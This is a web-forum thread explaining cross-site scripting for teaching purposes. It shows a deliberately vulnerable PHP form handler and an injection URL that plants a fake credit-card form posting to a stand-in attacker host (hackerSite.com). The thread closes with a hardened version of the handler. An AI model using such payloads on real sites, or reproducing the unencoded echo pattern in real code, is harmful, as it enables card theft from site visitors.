Member Avatar for begueradj

Hello
What do we call the attack that consists of inserting PHP/JavaScript code within a remote website's pages?
Thank you

I think you're talking about XSS, or Cross-Site Scripting.

I totally agree with GliderPilot. Most hackers are not really interested in breaking the target site. What they are really after is to steal information from the user.

Allow me to give you a very basic example and vulnerability demonstration of a form.

Let's say we have a form on our site. I will be using the weakest type of form implementation I have ever seen from askers here on DaniWeb. Something like this:

    <form action="hackme.php" method="request">
        <label>Type Your Name</label>
        <input type="text" name="name">
        <br/>
        <textarea name="comment"></textarea>
        <br/>
        <input type="submit" name="submit" value="submit"/>
    </form>

and the form processor for the above form is written like this...

    if(isset($_REQUEST['submit'])){

        echo $_REQUEST['name'];
        echo '<br/>';
        echo $_REQUEST['comment'].'<br/>';

        }

The hacker will visit your site and look at the html source of your form page. He will be able to get the information of your form processor hackme.php and the type of action used request.

The hacker will then test if your site can be injected by pasting this to the browser.

http://yourdomain.com/hackme.php?name=hello  Client <br/>Please Enter Your Credit Card Below<br/>&comment=<form action=http://hackerSite.com/gotcha.php method=post><br/><input type=text name=cc><br/><input type=submit name=submit value=submit>&submit=submit

The hacker will then check if the form injected into your form is shown on the page. If it is, they generate links to your site's form processors. The unsuspecting users will then type in their info, and the injected form will be processed on the hacker's site.

Try this on your localhost. Create a file named hack.php and paste the code below:

<?php 

$form = '<form action="hack.php" method="request">
         <label>Type Your Name</label>
         <input type="text" name="name">
         <br/>
         <textarea name="comment"></textarea>
         <br/>
         <input type="submit" name="submit" value="submit"/>
         </form>';

if(isset($_REQUEST['submit'])){

    echo $_REQUEST['name'];
    echo '<br/>';
    echo $_REQUEST['comment'].'<br/>';

}
else{
    echo $form;
}

Create another file called hacked.php and paste the code below:

<?php

    if(isset($_POST['submit'])){

     echo $_POST['cc'].'<br/>';

     }

Open your favorite browser and paste the injection code below.

localhost/hack.php?name=hello  Client <br/>Please Enter Your Credit Card Below<br/>&comment=<form action='localhost/hacked.php' method=post><br/><input type=text name=cc><br/><input type=submit name=submit value=submit>&submit=submit

Hit Enter; the hack.php page should create the injected form asking for a credit card number. Now type any number in the input and hit submit. That should take you to hacked.php.

The example above is pretty classic, but any unsuspecting new web developer can easily overlook this type of vulnerability.

I just want to add that my demonstration will work even on an upload form. So, be careful if your site is allowing users to upload. You need to screen those files to check whether they are allowed or not. Otherwise, malicious scripts can be uploaded to your site.
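
A hardened form of the `hack.php` handler from the demonstration above, as an added example that is not part of the original posts: it HTML-encodes both fields on output, reads only POST data, and sends a `form-action` Content-Security-Policy header. The helper names `e` and `render_submission` are assumptions made for this example, and the sample input is constructed from the localhost test URL in the post.

```php
<?php
// Added example, not code from the thread: hardened version of hack.php.
declare(strict_types=1);

// Encode a value for an HTML text context so markup in it is displayed, not parsed.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Build the response body from the submitted fields (array shaped like $_POST).
function render_submission(array $input): string
{
    // Accept only plain strings; name[]=x style arrays are treated as empty.
    $name    = is_string($input['name'] ?? null) ? $input['name'] : '';
    $comment = is_string($input['comment'] ?? null) ? $input['comment'] : '';

    return e($name) . '<br/>' . nl2br(e($comment)) . '<br/>';
}

$form = '<form action="hack.php" method="post">
         <label>Type Your Name</label>
         <input type="text" name="name">
         <br/>
         <textarea name="comment"></textarea>
         <br/>
         <input type="submit" name="submit" value="submit"/>
         </form>';

if (PHP_SAPI === 'cli') {
    // Constructed sample input, modelled on the localhost test URL in the post.
    $sample = [
        'name'    => 'hello  Client <br/>Please Enter Your Credit Card Below<br/>',
        'comment' => "<form action='localhost/hacked.php' method=post><input type=text name=cc>",
    ];
    echo render_submission($sample), PHP_EOL; // markup arrives as &lt;form ...&gt; text
    exit;
}

// Defence in depth: forms on this page may only submit back to this origin.
header("Content-Security-Policy: form-action 'self'");
header('Content-Type: text/html; charset=UTF-8');

// Read POST only, so a crafted link (GET query string) cannot supply the fields.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])) {
    echo render_submission($_POST);
} else {
    echo $form;
}
```

Run with `php hack.php` on the command line to see the encoded output for the sample input; served by a web server, the same file replaces the vulnerable handler.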
